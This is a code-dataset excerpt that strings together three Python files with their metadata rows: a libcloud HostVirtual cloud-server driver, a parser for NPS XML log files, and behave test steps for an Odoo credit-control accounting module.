import json
from libcloud.common.hostvirtual import HostVirtualResponse
from libcloud.common.hostvirtual import HostVirtualConnection
from libcloud.common.hostvirtual import HostVirtualException
from libcloud.compute.providers import Provider
from libcloud.compute.types import NodeState
from libcloud.compute.base import Node, NodeDriver
from libcloud.compute.base import NodeImage, NodeSize, NodeLocation
from libcloud.compute.base import NodeAuthSSHKey, NodeAuthPassword
API_ROOT = ''
NODE_STATE_MAP = {
'BUILDING': NodeState.PENDING,
'PENDING': NodeState.PENDING,
'RUNNING': NodeState.RUNNING, # server is powered up
'STOPPING': NodeState.REBOOTING,
'REBOOTING': NodeState.REBOOTING,
'STARTING': NodeState.REBOOTING,
'TERMINATED': NodeState.TERMINATED, # server is powered down
'STOPPED': NodeState.STOPPED
}
DEFAULT_NODE_LOCATION_ID = 21
class HostVirtualComputeResponse(HostVirtualResponse):
pass
class HostVirtualComputeConnection(HostVirtualConnection):
responseCls = HostVirtualComputeResponse
class HostVirtualNodeDriver(NodeDriver):
type = Provider.HOSTVIRTUAL
name = 'HostVirtual'
website = 'http://www.hostvirtual.com'
connectionCls = HostVirtualComputeConnection
features = {'create_node': ['ssh_key', 'password']}
def __init__(self, key, secure=True, host=None, port=None):
self.location = None
super(HostVirtualNodeDriver, self).__init__(key=key, secure=secure,
host=host, port=port)
def list_nodes(self):
try:
result = self.connection.request(
API_ROOT + '/cloud/servers/').object
except HostVirtualException:
return []
nodes = []
for value in result:
node = self._to_node(value)
nodes.append(node)
return nodes
def list_locations(self):
result = self.connection.request(API_ROOT + '/cloud/locations/').object
locations = []
for dc in result:
locations.append(NodeLocation(
dc["id"],
dc["name"],
dc["name"].split(',')[1].replace(" ", ""), # country
self))
return locations
def list_sizes(self, location=None):
params = {}
if location is not None:
params = {'location': location.id}
result = self.connection.request(
API_ROOT + '/cloud/sizes/',
params=params).object
sizes = []
for size in result:
n = NodeSize(id=size['plan_id'],
name=size['plan'],
ram=size['ram'],
disk=size['disk'],
bandwidth=size['transfer'],
price=size['price'],
driver=self.connection.driver)
sizes.append(n)
return sizes
def list_images(self):
result = self.connection.request(API_ROOT + '/cloud/images/').object
images = []
for image in result:
i = NodeImage(id=image["id"],
name=image["os"],
driver=self.connection.driver,
extra=image)
del i.extra['id']
del i.extra['os']
images.append(i)
return images
def create_node(self, name, image, size, **kwargs):
"""
Creates a node
Example of node creation with ssh key deployed:
>>> from libcloud.compute.base import NodeAuthSSHKey
>>> key = open('/home/user/.ssh/id_rsa.pub').read()
>>> auth = NodeAuthSSHKey(pubkey=key)
>>> from libcloud.compute.providers import get_driver;
>>> driver = get_driver('hostvirtual')
>>> conn = driver('API_KEY')
>>> image = conn.list_images()[1]
>>> size = conn.list_sizes()[0]
>>> location = conn.list_locations()[1]
>>> name = 'markos-dev'
>>> node = conn.create_node(name, image, size, auth=auth,
>>> location=location)
"""
dc = None
auth = self._get_and_check_auth(kwargs.get('auth'))
if not self._is_valid_fqdn(name):
raise HostVirtualException(
500, "Name should be a valid FQDN (e.g, hostname.example.com)")
# simply order a package first
pkg = self.ex_order_package(size)
if 'location' in kwargs:
dc = kwargs['location'].id
else:
dc = DEFAULT_NODE_LOCATION_ID
# create a stub node
stub_node = self._to_node({
'mbpkgid': pkg['id'],
'status': 'PENDING',
'fqdn': name,
'plan_id': size.id,
'os_id': image.id,
'location_id': dc
})
# provisioning a server using the stub node
self.ex_provision_node(node=stub_node, auth=auth)
node = self._wait_for_node(stub_node.id)
if getattr(auth, 'generated', False):
node.extra['password'] = auth.password
return node
def reboot_node(self, node):
params = {'force': 0, 'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/reboot',
data=json.dumps(params),
method='POST').object
return bool(result)
def destroy_node(self, node):
params = {
'mbpkgid': node.id,
# 'reason': 'Submitted through Libcloud API'
}
result = self.connection.request(
API_ROOT + '/cloud/cancel', data=json.dumps(params),
method='POST').object
return bool(result)
def ex_list_packages(self):
"""
List the server packages.
"""
try:
result = self.connection.request(
API_ROOT + '/cloud/packages/').object
except HostVirtualException:
return []
pkgs = []
for value in result:
pkgs.append(value)
return pkgs
def ex_order_package(self, size):
"""
Order a server package.
:param size:
:type node: :class:`NodeSize`
:rtype: ``str``
"""
params = {'plan': size.name}
pkg = self.connection.request(API_ROOT + '/cloud/buy/',
data=json.dumps(params),
method='POST').object
return pkg
def ex_cancel_package(self, node):
"""
Cancel a server package.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``str``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(API_ROOT + '/cloud/cancel/',
data=json.dumps(params),
method='POST').object
return result
def ex_unlink_package(self, node):
"""
Unlink a server package from location.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``str``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(API_ROOT + '/cloud/unlink/',
data=json.dumps(params),
method='POST').object
return result
def ex_get_node(self, node_id):
"""
Get a single node.
:param node_id: id of the node that we need the node object for
:type node_id: ``str``
:rtype: :class:`Node`
"""
params = {'mbpkgid': node_id}
result = self.connection.request(
API_ROOT + '/cloud/server', params=params).object
node = self._to_node(result)
return node
def ex_stop_node(self, node):
"""
Stop a node.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``bool``
"""
params = {'force': 0, 'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/shutdown',
data=json.dumps(params),
method='POST').object
return bool(result)
def ex_start_node(self, node):
"""
Start a node.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``bool``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/start',
data=json.dumps(params),
method='POST').object
return bool(result)
def ex_provision_node(self, **kwargs):
"""
Provision a server on a VR package and get it booted
:keyword node: node which should be used
:type node: :class:`Node`
:keyword image: The distribution to deploy on your server (mandatory)
:type image: :class:`NodeImage`
:keyword auth: an SSH key or root password (mandatory)
:type auth: :class:`NodeAuthSSHKey` or :class:`NodeAuthPassword`
:keyword location: which datacenter to create the server in
:type location: :class:`NodeLocation`
:return: Node representing the newly built server
:rtype: :class:`Node`
"""
node = kwargs['node']
if 'image' in kwargs:
image = kwargs['image']
else:
image = node.extra['image']
params = {
'mbpkgid': node.id,
'image': image,
'fqdn': node.name,
'location': node.extra['location'],
}
auth = kwargs['auth']
ssh_key = None
password = None
if isinstance(auth, NodeAuthSSHKey):
ssh_key = auth.pubkey
params['ssh_key'] = ssh_key
elif isinstance(auth, NodeAuthPassword):
password = auth.password
params['password'] = password
if not ssh_key and not password:
raise HostVirtualException(
500, "SSH key or Root password is required")
try:
result = self.connection.request(API_ROOT + '/cloud/server/build',
data=json.dumps(params),
method='POST').object
return bool(result)
except HostVirtualException:
self.ex_cancel_package(node)
def ex_delete_node(self, node):
"""
Delete a node.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``bool``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/delete', data=json.dumps(params),
method='POST').object
return bool(result)
def _to_node(self, data):
state = NODE_STATE_MAP[data['status']]
public_ips = []
private_ips = []
extra = {}
if 'plan_id' in data:
extra['size'] = data['plan_id']
if 'os_id' in data:
extra['image'] = data['os_id']
if 'fqdn' in data:
extra['fqdn'] = data['fqdn']
if 'location_id' in data:
extra['location'] = data['location_id']
if 'ip' in data:
public_ips.append(data['ip'])
node = Node(id=data['mbpkgid'], name=data['fqdn'], state=state,
public_ips=public_ips, private_ips=private_ips,
driver=self.connection.driver, extra=extra)
return node
def _wait_for_node(self, node_id, timeout=30, interval=5.0):
"""
:param node_id: ID of the node to wait for.
:type node_id: ``int``
:param timeout: Timeout (in seconds).
:type timeout: ``int``
:param interval: How long to wait (in seconds) between each attempt.
:type interval: ``float``
:return: Node representing the newly built server
:rtype: :class:`Node`
"""
# poll until we get a node
for i in range(0, timeout, int(interval)):
try:
node = self.ex_get_node(node_id)
return node
except HostVirtualException:
time.sleep(interval)
raise HostVirtualException(412, 'Timeout on getting node details')
def _is_valid_fqdn(self, fqdn):
if len(fqdn) > 255:
return False
if fqdn[-1] == ".":
fqdn = fqdn[:-1]
valid = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
if len(fqdn.split(".")) > 1:
return all(valid.match(x) for x in fqdn.split("."))
else:
return False
| apache-2.0 | -3,985,527,973,936,344,600 | 29.91314 | 79 | 0.5433 | false |
nomadpenguins/opeNPSnake | lib/fileParser.py | 1 | 4326 | import os
front_extra = ' data_type="4">' #Needed for parsing xml values, the front tags end
back_extra = '</' #Needed for parsing xml values, the back tags front
#Gets the xml values from the logs
#Expects the line of text from the log, the starting <' '> tag and ending </' '> tag
def get_xml_value(line, start_tag, end_tag):
x = line.find(start_tag)
if x == -1: #Returns N/A if that tag isn't there
return "N/A"
x += len(start_tag + front_extra)
y = line.find(end_tag)
return line[x:y]
#Parses the files and pulls the desired values
def parseFiles(inputDir, parameters):
values, count = [], []
for file in os.listdir(inputDir):
if file.endswith('.log'):
print("Parsing data from file: " + file)
inputFile = open(inputDir + file)
lines = inputFile.readlines() #List of lines in the file
for line in lines:
#Temp variable to store the values that will be reported
values_temp = []
#Boolean for checking if a filter has been broken
#False = the values get reported
#True = A filter has been broken
broken_filter = False
for param in parameters:
#The front <' '> tag
start_tag = param
#The back </' '> tag
end_tag = back_extra + param
#temp storage for the values
if param == 'User-Name':
xml_value = get_xml_value(line, '<'+start_tag, end_tag)
else:
xml_value = get_xml_value(line, start_tag, end_tag)
#Checks to see if it gets passed the filter or there is no filter
for filt in parameters[param]:
if filt == xml_value:
values_temp.append(xml_value)
if filt[:1] == '!':
if filt[1:] == xml_value:
broken_filter = True
elif filt[1:] != xml_value:
values_temp.append(xml_value)
if len(parameters[param]) <= 0:
values_temp.append(xml_value)
if len(values_temp) < len(parameters):
broken_filter = True
if not broken_filter:
#Checks to see if this is a duplicate line
if values_temp not in values:
values.append(values_temp)
count.append(1)
#Adds one to count if it is
else:
index = values.index(values_temp)
count[index] += 1
inputFile.close()
return values, count
#Parses the files for possible parameter types
def checkFilesForParameters(inputDir):
possible_params = []
for file in os.listdir(inputDir):
if file.endswith('.log'):
inputfile = open(inputDir + file)
#List that holds all the lines in the file
lines = inputfile.readlines()
#temp variable to hold a place in a line so we progress through the line
lastindex = 0
for line in lines:
while lastindex != -1:
#Where the last item was
lastindex = line.find(back_extra, lastindex)
#Next items first <' '>
fbracket = int(line.find(back_extra, lastindex)) + 2
#Next items second </' '>
sbracket = int(line.find('>', lastindex))
#Break if there are no more values
if sbracket == -1:
break
param = line[fbracket:sbracket]
#No duplicates
if param not in possible_params:
possible_params.append(param)
lastindex+=1
inputfile.close()
#These variable break or are specified through another cmdline argument
for param in ["Timestamp", "Event"]:
possible_params.remove(param)
return possible_params | apache-2.0 | 8,217,820,993,465,716,000 | 44.072917 | 85 | 0.495377 | false |
yvaucher/account-financial-tools | __unported__/account_credit_control/scenarios/features/steps/account_credit_control.py | 3 | 6507 | import time
from behave import given, when
from support import model
@given(u'I configure the following accounts on the credit control policy with oid: "{policy_oid}"')
def impl(ctx, policy_oid):
policy = model('credit.control.policy').get(policy_oid)
assert policy, 'No policy % found' % policy_oid
acc_obj = model('account.account')
accounts = []
for row in ctx.table:
acc = acc_obj.get(['code = %s' % row['account code']])
assert acc, "Account with code %s not found" % row['account code']
accounts.append(acc)
policy.write({'account_ids': [x.id for x in accounts]})
@when(u'I launch the credit run')
def impl(ctx):
assert ctx.found_item
# Must be a cleaner way to do it
assert 'credit.control.run' == ctx.found_item._model._name
ctx.found_item.generate_credit_lines()
@given(u'I clean all the credit lines')
def impl(ctx):
model('credit.control.line').browse([]).unlink()
@then(u'my credit run should be in state "done"')
def impl(ctx):
assert ctx.found_item
# Must be a cleaner way to do it
assert model("credit.control.run").get(ctx.found_item.id).state == 'done'
@then(u'the generated credit lines should have the following values')
def impl(ctx):
def _row_to_dict(row):
return dict((name, row[name]) for name in row.headings if row[name])
rows = map(_row_to_dict, ctx.table)
def _parse_date(value):
return time.strftime(value) if '%' in value else value
for row in rows:
account = model('account.account').get(['name = %s' % row['account']])
assert account, "no account named %s found" % row['account']
policy = model('credit.control.policy').get(['name = %s' % row['policy']])
assert policy, "No policy %s found" % row['policy']
partner = model('res.partner').get(['name = %s' % row['partner']])
assert partner, "No partner %s found" % row['partner']
maturity_date = _parse_date(row['date due'])
move_line = model('account.move.line').get(['name = %s' % row['move line'],
'date_maturity = %s' % maturity_date])
assert move_line, "No move line %s found" % row['move line']
level = model('credit.control.policy.level').get(['name = %s' % row['policy level'],
'policy_id = %s' % policy.id])
assert level, "No level % found" % row['policy level']
domain = [['account_id', '=', account.id],
['policy_id', '=', policy.id],
['partner_id', '=', partner.id],
['policy_level_id', '=', level.id],
['amount_due', '=', row.get('amount due', 0.0)],
['state', '=', row['state']],
['level', '=', row.get('level', 0.0)],
['channel', '=', row['channel']],
['balance_due', '=', row.get('balance', 0.0)],
['date_due', '=', _parse_date(row['date due'])],
['date', '=', _parse_date(row['date'])],
['move_line_id', '=', move_line.id],
]
if row.get('currency'):
curreny = model('res.currency').get(['name = %s' % row['currency']])
assert curreny, "No currency %s found" % row['currency']
domain.append(('currency_id', '=', curreny.id))
lines = model('credit.control.line').search(domain)
assert lines, "no line found for %s" % repr(row)
assert len(lines) == 1, "Too many lines found for %s" % repr(row)
date_lines = model('credit.control.line').search([('date', '=', ctx.found_item.date)])
assert len(date_lines) == len(ctx.table.rows), "Too many lines generated"
def open_invoice(ctx):
assert ctx.found_item
ctx.found_item._send('invoice_open')
# _send refresh object
assert ctx.found_item.state == 'open'
@then(u'I open the credit invoice')
def impl(ctx):
open_invoice(ctx)
@given(u'I open the credit invoice')
def impl(ctx):
open_invoice(ctx)
@given(u'there is "{state}" credit lines')
def impl(ctx, state):
assert model('credit.control.line').search(['state = %s' % state])
@given(u'I mark all draft email to state "{state}"')
def impl(ctx, state):
wiz = model('credit.control.marker').create({'name': state})
lines = model('credit.control.line').search([('state', '=', 'draft')])
assert lines
ctx.lines = lines
wiz.write({'line_ids': lines})
wiz.mark_lines()
@then(u'the draft line should be in state "{state}"')
def impl(ctx, state):
assert ctx.lines
lines = model('credit.control.line').search([('state', '!=', state),
('id', 'in', ctx.lines)])
assert not lines
@given(u'I ignore the "{partner}" credit line at level "{level:d}" for move line "{move_line_name}" with amount "{amount:f}"')
def impl(ctx, partner, level, move_line_name, amount):
print ctx, partner, level, move_line_name, amount
to_ignore = model('credit.control.line').search([('partner_id.name', '=', partner),
('level', '=', level),
('amount_due', '=', amount),
('move_line_id.name', '=', move_line_name)])
assert to_ignore
wiz = model('credit.control.marker').create({'name': 'ignored'})
ctx.lines = to_ignore
wiz.write({'line_ids': to_ignore})
wiz.mark_lines()
assert model('credit.control.line').get(to_ignore[0]).state == 'ignored'
@given(u'I have for "{partner}" "{number:d}" credit lines at level "{level:d}" for move line "{move_line_name}" with amount "{amount:f}" respectively in state "draft" and "ignored"')
def impl(ctx, partner, number, level, move_line_name, amount):
to_check = model('credit.control.line').search([('partner_id.name', '=', partner),
('level', '=', level),
('amount_due', '=', amount),
('move_line_id.name', '=', move_line_name),
('state', 'in', ('draft', 'ignored'))])
assert_equal(len(to_check), int(number), msg="More than %s found" % number)
lines = model('credit.control.line').browse(to_check)
assert set(['ignored', 'draft']) == set(lines.state)
| agpl-3.0 | -6,258,230,944,134,524,000 | 43.875862 | 182 | 0.549255 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.